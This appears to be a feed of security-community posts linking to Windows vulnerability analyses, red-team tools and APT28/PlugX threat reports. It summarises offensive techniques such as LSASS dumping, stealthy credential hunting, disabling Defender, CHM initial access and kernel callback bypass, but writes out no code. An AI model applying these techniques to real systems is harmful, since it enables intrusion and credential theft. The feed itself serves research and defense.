FFE4

An analysis of CVE-2026-21236 - A heap based buffer overflow in the Microsoft Windows Kernel afd.sys - was just published by @ASN_Sinanju_06S a recent secondment with my team EDG! Nice work for her first triage of a kernel memory corruption bug! nccgroup.com/research/vulne…

Ghost in the PPL - LSASS Memory Dump core-jmp.org/2026/03/ghost-… #redteam

This week’s video covers CVE-2026-24291, a Windows LPE nicknamed RegPwn by the team over at @MDSecLabs. As a part-time sloperator (Google it), I whipped up a quick RegPwn BOF, and in the video I demo it with Mythic and Apollo. Link below.

Hunt credentials via LotL by querying the native Windows Search DB (OLE DB) directly. Inspired by @wunderwuzzi23, I built Invoke-WindowsSearch to automate stealthy extraction across AD. - Script: tinyurl.com/549wrcyh - Full methodology in my vault: tinyurl.com/549wrcyh

.@Volexity recently released GoResolver v1.4, bringing significant updates to our #opensource tool for recovering symbol data from obfuscated Go binaries. This release is available on GitHub: github.com/volexity/GoRes… [1/8]

🚨 🇷🇺 𝗡𝗘𝗪 𝗥𝗘𝗦𝗘𝗔𝗥𝗖𝗛: 𝗢𝗽𝗲𝗿𝗮𝘁𝗶𝗼𝗻 𝗥𝗼𝘂𝗻𝗱𝗶𝘀𝗵 - 𝗨𝗻𝗰𝗼𝘃𝗲𝗿𝗶𝗻𝗴 𝗮𝗻 𝗔𝗣𝗧𝟮𝟴 𝗥𝗼𝘂𝗻𝗱𝗰𝘂𝗯𝗲 𝗘𝘅𝗽𝗹𝗼𝗶𝘁𝗮𝘁𝗶𝗼𝗻 𝗧𝗼𝗼𝗹𝗸𝗶𝘁 𝗧𝗮𝗿𝗴𝗲𝘁𝗶𝗻𝗴 𝗨𝗸𝗿𝗮𝗶𝗻𝗲 During infrastructure analysis, we identified an exposed server hosting what appears to be a complete Roundcube exploitation toolkit linked to #APT28 (#FancyBear) operations. Full technical analysis + IOCs here 👇 hunt.io/blog/operation… Key findings: • Open directory exposed 61 files across 36 directories containing payloads, tooling, and operator artifacts • Toolkit targets Roundcube webmail for credential harvesting, mailbox exfiltration, and persistent mail forwarding • 14 TTP overlaps with ESET's documented Operation RoundPress campaign • Infrastructure targeting mail.dmsu(.)gov(.)ua (#Ukraine State Migration Service) • Toolkit includes a Flask C2 server, CSS side-channel module, and a Go Linux implant (httd)

@NytroRST great，I just published a tool for User Choice Latest hash Verification github.com/cssxn/UserChoi…

Windows UserChoice Protection Driver UCPD / UCPD.sys / UCPDMgr.exe hitco.at/blog/windows-u… (German)

What if disabling Defender didn't require malware or exploits? A proof of concept shows how simple ACL changes to kernel32.dll can quietly stop security services from starting after reboot. Binary Defense researchers break down the technique and how defenders can detect it. Full analysis: binarydefense.com/resources/blog…

I am releasing a new toolkit I built for IIS-based lateral movement and code execution within IIS worker pool process's memory. Phantom ASPX Loader & PhantomLink -- a two-part toolkit for reflectively loading native DLLs into IIS w3wp.exe worker processes via ASPX. github.com/zux0x3a/Phanto…

@init1security chm is a monitored extension for all DERs

Years ago, we used older macro-enabled techniques such as EarlyAPC and NtMapViewOfSection in our macros, but we have since fully transitioned to more "obscure" extensions and successfully applied them to CHM files. The Initial Access Framework has come along way!! #redteam

@HaifeiLi can u share the sample

No idea who submitted this* but this is a “zero-day but probably non-exploitable crash” which could be triggered on the latest WPS Office software (which is popular especially in Asia), and there’s a wild message in the sample seems to me (?). Since this is non-exploitable crash and no payload found, full disclosure soon. pub.expmon.com/analysis/31128… * EXPMON does not track any information of the submitter, only receive samples. #expmon #0day #zeroday #wps #exploitdetection

Check out our new post!!! PlugX Meeting Invitation via MSBuild and GDATA lab52.io/blog/plugx-mee…

Throwing out an updated IOCTL dump for up to Windows 26100+. Contains ~300 more than the previous. gist.github.com/daaximus/51c64…

CVE-2026-21513 is already being exploited in the wild. Using PatchDiff-AI, we analyzed how a malicious .LNK can abuse MSHTML to bypass security boundaries and achieve code execution in activity linked to APT28. Full analysis: akamai.com/blog/security-…

This is a great find from @malwrhunterteam and a great observation from @marsomx_. The LNK breaks parsers. Next stage likely 151784e447beb38f29a06cd03ac02897 (xa0.dll, which is " .dll"). Seems to copy/open a PDF in the Downloads folder, or creates corrupt if N/A.

Notepad RCE (CVE-2026-20841) is getting a lot of attention. This is part of the content provided through our subscription. Check out our simple analysis and judge for yourself.😀 github.com/patchpoint/CVE… #notepad #RCE

GitHub - pollotherunner/CVE-2025-61155: Official public advisory for CVE-2025-61155 - github.com/pollotherunner…

Exploit Demo & Analysis Article by 78ResearchLab(@78_lab) CVE-2026-20817 : Windows Error Reporting(WER) Service Elevation of Privilege Vulnerability blog.78researchlab.com/2ffdb461-3e5b-… #CVE_2026_20817 #LPE #Windows

I promise this is the last tracer I post (now I got everything covered that I usually analyze), but here is a little WinDbg driver tracer plugin I wrote to quickly analyze virtualized drivers. Logs module transitions, i.e. external function calls. :) github.com/eversinc33/drv…

🏉 Bypassing Image Load Kernel Callbacks Blog: mdsec.co.uk/2021/06/bypass… Author: @_batsec_ #infosec